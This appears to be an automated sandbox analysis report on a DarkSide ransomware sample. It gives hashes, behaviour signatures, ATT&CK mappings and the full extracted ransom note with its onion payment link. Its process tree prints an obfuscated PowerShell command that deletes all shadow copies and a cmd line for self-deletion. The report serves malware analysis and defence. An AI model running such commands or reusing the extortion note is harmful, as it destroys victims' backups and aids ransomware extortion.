Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    19-08-2023 15:27

General

  • Target

    485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe

  • Size

    58KB

  • MD5

    485b9fd90d99ec5e6683fa4448924da8

  • SHA1

    744d07feeaa7cb10b11d5ec72418bd1ecbbba819

  • SHA256

    93cb3d33780673999559924e7df3f1d930ab9eda4ce61f8c6fed80547c8b7234

  • SHA512

    3734e195e9a9a73a5ae0b8daa88b62303da69a2734312448cf26d469c2a811e0ebe4bfd0b90f56e6bf1998d1b4baccece7811bcb78bec1f196819e289f45a0b6

  • SSDEEP

    768:ZjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylvMpY23W58:Cx7Fu4/ihrhDTV1ylvMSZ58

Malware Config

Extracted

Path

C:\Users\Admin\README.3f8e9045.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (183) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2912
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:268
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\485B9F~1.EXE >> NUL
      2⤵
      • Deletes itself
      PID:3240
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2744

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

2
T1112

Subvert Trust Controls

1
T1553

Install Root Certificate

1
T1553.004

Credential Access

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Discovery

System Information Discovery

1
T1082

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    34eb10aeb88f61a118a6812d09f086c5

    SHA1

    6d3b5bca8335007bfef363bb220db753ffa84fff

    SHA256

    ba44c0ffe950de4ac3697492f5ea746e37508cd8dc4267d7fe7fb1b405e75682

    SHA512

    2ae589a1641f02d369c9b5d3e5d831f0c46238e71ab1d9d782d573f64ef6a38d9e4ae1cadf02fa0a79b47d2ff1e7ac04daea0fb460d346950fa34812fa93db84

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    eaceb8f4a46099cb3873b860bcca34c1

    SHA1

    6bea32b8a425ca692a2df4d7d612322c28a25f86

    SHA256

    737b0667f49028839573005c20794a2aab9f7b9ea3c7e6253ffd65ce9e449e69

    SHA512

    45d698e771bdd52037316fa32f8b28e046351b35d32e135ebddfbc449dd54f0b0c37dda70a27022e37ea931d486dba6e6bb002d3ad38c86534ca26d16dba0068

  • C:\Users\Admin\AppData\Local\Temp\CabC92B.tmp
    Filesize

    62KB

    MD5

    3ac860860707baaf32469fa7cc7c0192

    SHA1

    c33c2acdaba0e6fa41fd2f00f186804722477639

    SHA256

    d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

    SHA512

    d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

  • C:\Users\Admin\AppData\Local\Temp\TarCB9E.tmp
    Filesize

    164KB

    MD5

    4ff65ad929cd9a367680e0e5b1c08166

    SHA1

    c0af0d4396bd1f15c45f39d3b849ba444233b3a2

    SHA256

    c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

    SHA512

    f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    e7cce87c72a98155ad342be0f13b5504

    SHA1

    ca393115c8f9bf19a77d60a8ffddb2be3864c79a

    SHA256

    4f8fdef37fb7d60f746709b3de640cde9c8073cd40279c83b8ffa960bf6be7ef

    SHA512

    e2e6c9c80c4ccb528a0ef6d8c55a3c5bff4589f352873ca7a39f1a0c2906a1c55fd5930c5b8b7ee9647b8ff9ee5e158e71a93d624970d03d55f046de8d791910

  • C:\Users\Admin\README.3f8e9045.TXT
    Filesize

    1KB

    MD5

    65494ea6831e577d82fac2b91b9c3d43

    SHA1

    5c23717d22ee9b94306f2d5a2a53c60aca03eb8c

    SHA256

    5e98b41a51606e16dda30ad4a49457227f75d71ad2004e2942c6b8de6202c4f3

    SHA512

    28ba13f7793ac8271af03b26eaeba6cbe707bf1f07fb1792818a6ab270d1c20d0091ef4a10c092f60c373aefe09698d2b470ec6a7f8cfa47103fd8bbb8d7a7bb

  • memory/268-136-0x000000001B210000-0x000000001B4F2000-memory.dmp
    Filesize

    2.9MB

  • memory/268-138-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
    Filesize

    32KB

  • memory/268-137-0x0000000002800000-0x0000000002880000-memory.dmp
    Filesize

    512KB

  • memory/268-139-0x0000000002800000-0x0000000002880000-memory.dmp
    Filesize

    512KB

  • memory/268-140-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
    Filesize

    9.6MB

  • memory/268-135-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
    Filesize

    9.6MB

  • memory/268-133-0x000007FEF5740000-0x000007FEF60DD000-memory.dmp
    Filesize

    9.6MB

  • memory/268-134-0x0000000002800000-0x0000000002880000-memory.dmp
    Filesize

    512KB